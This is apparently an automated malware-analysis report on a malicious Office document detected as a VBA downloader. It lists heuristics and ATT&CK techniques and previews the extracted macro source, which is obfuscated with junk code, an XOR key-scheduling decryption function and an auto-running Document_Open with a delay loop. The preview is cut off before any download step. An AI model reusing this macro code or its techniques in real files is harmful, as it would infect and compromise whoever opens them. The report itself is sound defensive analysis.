MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the Document_Open macro attempts to execute arbitrary code using the Shell() function. This is a common technique for downloading and executing further malicious content, as suggested by the ClamAV detection name 'Doc.Downloader.Adnel-6923089-0'.
Heuristics 8
-
ClamAV: Doc.Downloader.Adnel-6923089-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Adnel-6923089-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36964 bytes |
SHA-256: bab97032f27679ec7a2d4b36e936f6644ef19f3ae04eecb42f63380c1178f5e8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function JykTJQD4G2cOy8 Lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC" (ByVal YgAUarPfLxPdtCA As String, HTZKc23cQRC As Long) As Long #Else Private Declare Function JykTJQD4G2cOy8 lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC"(byval YgAUarPfLxPdtCA as String, HTZKc23cQRC as Long ) as Long #End If Sub LJvPzGuIEvbDez() UKAYbwDZ57 = 12 PrjeFdHhj = 33 + 22 + 57 + 51 Beep Err.Raise 11 Reset Loc 36 GetObject 12, 85 If CDate(38) = True Then Nvyk5q05hN = 8078 HRmRG960xOhdF = CVErr(33) DateAdd "R05hNTOz", 96, 31 BHfgxvQe0CWo = CVar(4) HjMXrEGB7EIG = Day(12) CallByName VOnl0L8H, 61, VbMethod, 12, 33, 22 Mr7DgjGS2s = UCase(57) If CBool(51) = True Then SDwIEM9hCP9 = 94 Stop WeekdayName 37 Weekday 84 LOzjsXjIJ0v6vo = Cos(10) XE17KKuzTHoL = CVDate(69) DatePart "NJ32Vn746", 61 ChDrive 83 LoadPicture 17, 45, 86, 62, 80 RgTjI5wZBmKNXtLZ = LCase(26) Rate 16, 72, 76 FV 39, 77, 88 If CDec(4) = True Then V6Xugu2ek = 83 Command IsDate 44 If CDbl(61) = True Then JyjarAm1V7y = 63 H16qDwlagaUNgmZ = CSng(59) Load A00gFR6ds MPi7q2sOqHMpNK = 51 REjVIp2fr3z1 = 41 + 97 + 28 + 63 End Sub Function IXBQ8rXi7(ByVal AKCwkL As String, UmeZOQvT9 As String) As String NcHt1P34 = 25 RDouSkfS = 73 + 73 + 26 + 42 On Error Resume Next OFbMl1X7VZm5qH = 87 LlXCOfqQ1qOwG = 56 + 77 + 88 + 81 Dim ElmivNz() As Byte, L56ObCqtgE(0 To 285) As Integer, Comk() As Byte, BGqsIjn9Ar4W7tbNS, YSR3FY6aQILHBXlvq, FbuWg95k2F, B9JLDUu6bU8, V4EY3 As Boolean Qqw9XZOphom = 71 Yuzaf = 80 + 7 + 27 + 67 ElmivNz = StrConv(AKCwkL, (64 + 1 + 64 - 1)) KjgW8N2pMAUPTc60c = 74 Fi2nVr35ba = 70 + 36 + 14 + 53 Comk() = StrConv(UmeZOQvT9, (64 + 4 + 64 - 4)) H49TBhCiIG = 25 WcZih9dmDTN = 43 + 88 + 78 + 35 YSR3FY6aQILHBXlvq = UBound(Comk) RWo3yOnFmn = 17 IXSlOjD00MfNG = 48 + 28 + 34 + 18 For BGqsIjn9Ar4W7tbNS = 0 To (127.5 + 5 + 127.5 - 5) L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS Next BGqsIjn9Ar4W7tbNS For BGqsIjn9Ar4W7tbNS = (128 + 8 + 128 - 8) To (142.5 + 8 + 142.5 - 8) L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS Xor (128 + 2 + 128 - 2) Next BGqsIjn9Ar4W7tbNS For BGqsIjn9Ar4W7tbNS = 1 To (3 + 6 + 3 - 6) L56ObCqtgE(BGqsIjn9Ar4W7tbNS + (124.5 + 1 + 124.5 - 1)) = Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS) L56ObCqtgE(BGqsIjn9Ar4W7tbNS - 1) = Comk(BGqsIjn9Ar4W7tbNS - 1) Xor ((127.5 + 2 + 127.5 - 2) - Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS)) Next BGqsIjn9Ar4W7tbNS V4EY3 = False FbuWg95k2F = 0 B9JLDUu6bU8 = 0 For BGqsIjn9Ar4W7tbNS = 0 To UBound(ElmivNz) If FbuWg95k2F > YSR3FY6aQILHBXlvq Then FbuWg95k2F = 0 If B9JLDUu6bU8 > (142.5 + 1 + 142.5 - 1) And V4EY3 = False Then B9JLDUu6bU8 = 0: V4EY3 = Not (V4EY3) If B9JLDUu6bU8 > (142.5 + 4 + 142.5 - 4) And V4EY3 = True Then B9JLDUu6bU8 = (2.5 + 4 + 2.5 - 4): V4EY3 = Not (V4EY3) ElmivNz(BGqsIjn9Ar4W7tbNS) = (ElmivNz(BGqsIjn9Ar4W7tbNS) Xor (L56ObCqtgE(B9JLDUu6bU8) Xor Comk(FbuWg95k2F))) FbuWg95k2F = FbuWg95k2F + 1 B9JLDUu6bU8 = B9JLDUu6bU8 + 1 Next BGqsIjn9Ar4W7tbNS BQ4X3YQb = 76 MdRZAL849TBhCi = 17 + 20 + 38 + 57 IXBQ8rXi7 = StrConv(ElmivNz(), (32 + 2 + 32 - 2)) Kl1fA = 37 IHiTDNOmV2vm = 8 + 21 + 35 + 66 End Function Sub Document_Open() NPUHgDq39g = 67 JzkEVf900xBR = 41 + 48 + 98 + 75 On Error Resume Next HHsvV0SAXpLopC = 21 Lnnl8ewgIOG = 60 + 16 + 24 + 51 Dim BljIJUx8I5 As Long, MnDhCIs6Wf1q7p As Long, QJ9YpQevhGn As Long, P1ZZ6WLZ As Long COpZ3hWr = 44 TqA1UeOSaVDnPEjUftu = 39 + 27 + 62 + 56 BljIJUx8I5 = 97673669: MnDhCIs6Wf1q7p = 0: QJ9YpQevhGn = 0 AioxM21uwTiOWQmiN = 97 NTpNi = 4 + 87 + 35 + 64 For MnDhCIs6Wf1q7p = 1 To BljIJUx8I5 QJ9YpQevhGn = QJ9YpQevhGn + 1 Next MnDhCIs6Wf1q7p WcxI7EcvaPM8AQKU = 58 GzIxmaFC0aQj1 = 69 + 62 + 84 + 17 If QJ9YpQevhGn = BljIJUx8I5 Then FL72KDOpvBzTBo5O2 = 55 UYzd0ANInn = 4 + 59 + 19 + 87 Dim RCyBgh8j5qV ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.